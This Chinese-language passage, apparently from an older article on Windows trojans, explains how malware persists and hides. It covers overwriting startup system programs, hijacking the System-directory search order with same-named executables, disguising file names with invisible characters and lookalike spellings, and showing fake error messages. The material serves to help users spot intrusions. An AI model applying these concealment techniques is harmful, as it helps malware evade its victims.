這為惡意程序提供了機會，通過覆蓋這些文件，不必修改任何設置系統就會自動執行它們！而用戶在檢查注冊表和系統配置時不會引起任何懷疑，例如「注冊表檢查」 程序的作用是啟動時檢查和備份注冊表，正常情況不會有任何提示，那麼它被覆蓋後真可謂是「神不知、鬼不覺」。當然，這也許會被「系統文件檢查器」檢查（但勤快的人不多）出來。

黑客還有一高招「偷天換日」！不覆蓋程序也可達到這個目的，方法是：利用System目錄比Windows目錄優先的特點，以相同的文件名，將程序放到System目錄中。你可以試試，將Notepad.exe(記事本)復制到System目錄中，並改名為Regedit.exe(注冊表編輯器)，然後從「開始」→「運行」中，輸入「Regedit」回車，你會發現運行的竟然是那個假冒的Notepad.exe！同樣，如果黑客將程序放到System中，然後在運行時調用真正的Regedit，誰知道呢？(這種方法由於大部分目標程序不是經常被系統調用，因此常被黑客用來作為被刪除後的恢復方法，如果某個東東被刪除了又出現，不妨檢查檢查這些文件。)

十一、還有什麼「高招」

黑客還常常使用名字欺騙技術和運行假象與之配合。名字欺騙技術如上述的全形空格主文件名「.exe」就是一例，另外常見的有在修改文件關聯時，使用「 」（ASCII值255，輸入時先按下Alt鍵，然後在小鍵盤上輸入255）作為文件名，當這個字元出現在注冊表中時，人們往往很難發現它的存在。此外還有利用字元相似性的，如：「Systray.exe」和「5ystray」(5與大寫S相似)；長度相似性的，如：「Explorer.exe」和「Explore.exe」(後者比前者少一個字母，心理學實驗證明，人的第一感覺只識別前四個字母，並對長度不敏感)；運行假象則是指運行某些木馬時，程序給出一個虛假的提示來欺騙用戶。一個運行後什麼都沒有的程序，地球人都知道不是什麼好東西；但對於一個提示「內存不足的程序，恐怕還在埋怨自己的內存太少哩！